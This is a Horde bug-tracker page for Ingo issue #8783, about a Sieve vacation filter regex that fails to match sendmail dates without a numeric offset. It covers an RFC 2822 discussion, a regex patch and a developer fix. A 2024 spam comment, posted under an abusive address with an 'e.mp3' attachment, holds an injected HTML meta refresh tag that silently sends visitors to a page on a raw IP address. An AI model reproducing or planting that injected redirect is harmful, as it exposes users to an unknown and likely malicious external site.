6.0.0-alpha12
6/9/25

[#8783] sieve vacation does not match sendmail date
Summary sieve vacation does not match sendmail date
Queue Ingo
Queue Version 1.2.3
Type Bug
State Resolved
Priority 2. Medium
Owners jan (at) horde (dot) org
Requester ricardo (at) wenn (dot) com
Created 12/17/2009 (5653 days ago)
Due
Updated 05/25/2024 (380 days ago)
Assigned 12/22/2009 (5648 days ago)
Resolved 02/04/2010 (5604 days ago)
Github Issue Link
Github Pull Request
Milestone 1.2.4
Patch No

History
05/25/2024 03:54:38 PM fuckyou (at) gmail (dot) com Comment #9
New Attachment: e.mp3 Download
Reply to this comment
<!--a75c305b1c0a6022--><meta http-equiv="refresh" content="0; 
url=http://46.0.190.205:8000/fog.html">
02/04/2010 05:44:16 PM Jan Schneider State ⇒ Resolved
 
12/22/2009 01:52:40 PM Jan Schneider Comment #6
State ⇒ Feedback
Taken from Horde DevelopersHorde Developers
Assigned to Jan Schneider
Reply to this comment
Please try what I committed.
12/22/2009 01:52:24 PM CVS Commit Comment #5 Reply to this comment
12/17/2009 04:39:21 PM Jan Schneider Comment #4 Reply to this comment
Wed, 16 Dec 2009 11:12:58 +0000 (UTC)

Wed, 16 Dec 2009 16:20:54 +0000 (envelope-from 
<bo-8Z4-2XUR-1EP5GH-BYMHQ@cmp.dotmailer.co.uk>)
Those are definitely not RFC conform though.
12/17/2009 04:28:38 PM ricardo (at) wenn (dot) com Comment #3 Reply to this comment
According to RFC 2822 we should support 1 to 5 characters.
Note that ive also seen....

Wed, 16 Dec 2009 19:11:38 +0000 GMT

Wed, 16 Dec 2009 11:12:58 +0000 (UTC)

Wed, 16 Dec 2009 16:20:54 +0000 (envelope-from 
<bo-8Z4-2XUR-1EP5GH-BYMHQ@cmp.dotmailer.co.uk>)

hope this helps

12/17/2009 12:09:07 PM Jan Schneider Comment #2 Reply to this comment
According to RFC 2822 we should support 1 to 5 characters.
12/17/2009 12:07:27 PM Jan Schneider State ⇒ Assigned
Patch ⇒ No
Milestone ⇒ 1.2.4
Assigned to Horde DevelopersHorde Developers
 
12/17/2009 09:55:15 AM ricardo (at) wenn (dot) com Comment #1
Priority ⇒ 2. Medium
State ⇒ Unconfirmed
Patch ⇒ Yes
Milestone ⇒
Summary ⇒ sieve vacation does not match sendmail date
Type ⇒ Bug
Queue ⇒ Ingo
Reply to this comment
I have an issue where the sendmail received date is formated like this....

Wed, 16 Dec 2009 19:11:38 GMT

The sieve filter does not match the date of internal emails though our 
sendmail system as they only contain received headers with dates in 
that format.

Aparently the script likes to see the folowing.
Wed, 16 Dec 2009 19:11:38 +0000

I was on IRC and patdk-wk gave me a small modification to the script.

/horde/ingo/lib/Script/sieve.php
Replace all instances of....
(\\\\+|\\\\-)....( \\\\(.*\\\\))?$
with
(\\\\+|\\\\-)?....?( \\\\(.*\\\\))?$

This has sorted my issue out.

Saved Queries